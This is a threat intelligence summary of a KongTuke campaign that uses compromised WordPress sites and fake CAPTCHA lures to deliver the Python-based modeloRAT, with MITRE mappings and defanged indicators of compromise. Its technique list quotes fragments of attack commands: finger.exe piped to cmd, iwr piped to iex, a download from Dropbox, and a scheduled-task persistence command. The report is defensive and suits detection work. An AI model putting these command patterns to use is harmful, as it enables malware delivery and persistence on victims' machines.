TrendAI Vision One™ MDR observed an active KongTuke campaign using compromised WordPress sites and fake CAPTCHA/CrashFix lures to deliver the Python-based modeloRAT, which performs reconnaissance, remote command execution, and persistent access. #KongTuke #modeloRAT
Keypoints
- Threat actor KongTuke continues to deliver modeloRAT via compromised WordPress sites with injected JavaScript that prompts victims to run PowerShell commands through fake CAPTCHA or CrashFix-style lures.
- Attackers abuse legitimate tools and services—PowerShell, finger.exe, Dropbox-hosted archives, portable Python distributions, and Telegram infrastructure—to evade detection and maintain C2 connectivity.
- Initial execution includes copying and running finger.exe to pipe remote responses into cmd, decoding an in-memory ROT-obfuscated PowerShell loader, and downloading a second-stage PowerShell script to %AppData%.
- modeloRAT (Python) enumerates host and network details, checks domain membership and installed security products, and sends structured JSON telemetry to C2 endpoints via HTTP and Telegram-backed channels.
- Persistence is achieved through a Run registry value (monitoringservice) and a scheduled task named “SoftwareProtection” that repeatedly launches the malicious Python payload.
- The operation uses multilayered obfuscation (reversal, Base64, zlib, Base85, AES-256, compiled bytecode/marshal) across udp.pyw and run.pyw, indicating a modular, persistent backdoor architecture.
- TrendAI recommends hardening WordPress servers, enhancing endpoint detection/monitoring for suspicious command-line and network behavior, and user awareness to avoid running copied commands.
MITRE Techniques
- [T1190 ] Exploit Public-Facing Application – Compromise and injection of malicious JavaScript into WordPress sites to deliver payloads (‘injected malicious JavaScript into legitimate WordPress websites’).
- [T1204 ] User Execution – Social-engineering lures (fake CAPTCHA, CrashFix extension) trick users into installing extensions or running PowerShell commands (‘fake CAPTCHA page instructing the user to run a PowerShell command’).
- [T1059.001 ] PowerShell – Use of Invoke-WebRequest and Invoke-Expression to download and execute subsequent stages (‘uses Invoke-WebRequest (iwr) and pipes output to iex (Invoke-Expression)’).
- [T1218 ] Signed Binary Proxy Execution – Abusing legitimate finger.exe by copying it to a temp executable and piping network responses into cmd to achieve RCE (‘copy %windir%system32finger.exe %temp%ct.exe …|cmd’).
- [T1055 ] In-memory Execution / Process Injection – ROT-decoded PowerShell blob reconstructed and executed in memory without initial disk writes (‘executes it in memory, then executes it without initially writing to the disk’).
- [T1105 ] Ingress Tool Transfer – Downloading a ZIP/portable Python distribution and additional Python scripts from Dropbox to %AppData% (‘iwr -Uri ” hxxps://www[.]dropbox[.]com/…” -OutFile “$env:appdataWinpython.zip”‘).
- [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communications via HTTP POST to attacker IPs and connections to Telegram infrastructure (‘sends the collected data via HTTP POST to: hxxp://45.61.138[.]224/n’ and ‘HTTPS connection to 149.154.164.13 (associated with Telegram infrastructure)’).
- [T1547.001 ] Registry Run Keys and Startup Folder – Persistence via a Run key entry named monitoringservice pointing to pythonw.exe and modes.py (‘HKCUSoftwareMicrosoftWindowsCurrentVersionRun … monitoringservice’).
- [T1053.005 ] Scheduled Task/Job – Persistent scheduled task “SoftwareProtection” created to run the Python payload every five minutes (‘schtasks.exe /create /tn SoftwareProtection … /sc minute /mo 5’).
- [T1082 ] System Information Discovery – Extracting domain membership and system details via systeminfo and other enumeration commands (‘extracts domain information from systeminfo to determine whether the host is joined to a domain’).
- [T1057 ] Process Discovery – Enumerating running processes and checking for security/analysis tools before executing (‘enumerates running processes (Get-Process) and compares each process name against that list’).
- [T1518.001 ] Software Discovery – Querying WMI for installed antivirus products to identify security tooling (‘Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct’).
- [T1564 ] Hide Artifacts – Deleting transient script files after execution to reduce forensic evidence (‘runs it via PowerShell, and deletes it to reduce forensic evidence’).
Indicators of Compromise
- [Domain ] Malicious injected script domains observed on compromised WordPress sites – hxxps://ainttby[.]com/6f54.js, hxxps://ctpsih[.]com/2d5h.js, and 1 more domain (foodgefy[.]com/6o0jk.js).
- [IP Address ] C2 and hosting infrastructure – 45.61.138[.]224 (C2 receiving HTTP POST), 162.33.178[.]171 (script host, AS399629), and 3 more IPs (158.247.252[.]178, 170.168.103[.]208, 149.154.164[.]13 [Telegram]).
- [File name / Path ] Downloaded and executed artifacts in %AppData% – Winpython.zip (WPy64-31401), modes.py, extentions.py, and additional files (run.pyw, udp.pyw).
- [Registry / Scheduled Task ] Persistence artifacts – HKCUSoftwareMicrosoftWindowsCurrentVersionRun -> monitoringservice (points to pythonw.exe modes.py), and scheduled task ‘SoftwareProtection’ created via schtasks.exe.
- [URLs / Hosting ] Dropbox-hosted payload delivery links used for ingress tool transfer – example Dropbox download commands shown (dropbox.com/… rp?rlkey=…&dl=1) and other Dropbox URLs used to fetch Winpython.zip and extention files.
- [Command / Process ] Abused and created executables/processes – copy of finger.exe renamed to %temp%ct.exe used to pipe commands, pythonw.exe launched from C:Users…AppDataRoamingWPy64-31401pythonpythonw.exe, and run.exe/run.pyw under SoftwareProtectionPlatform.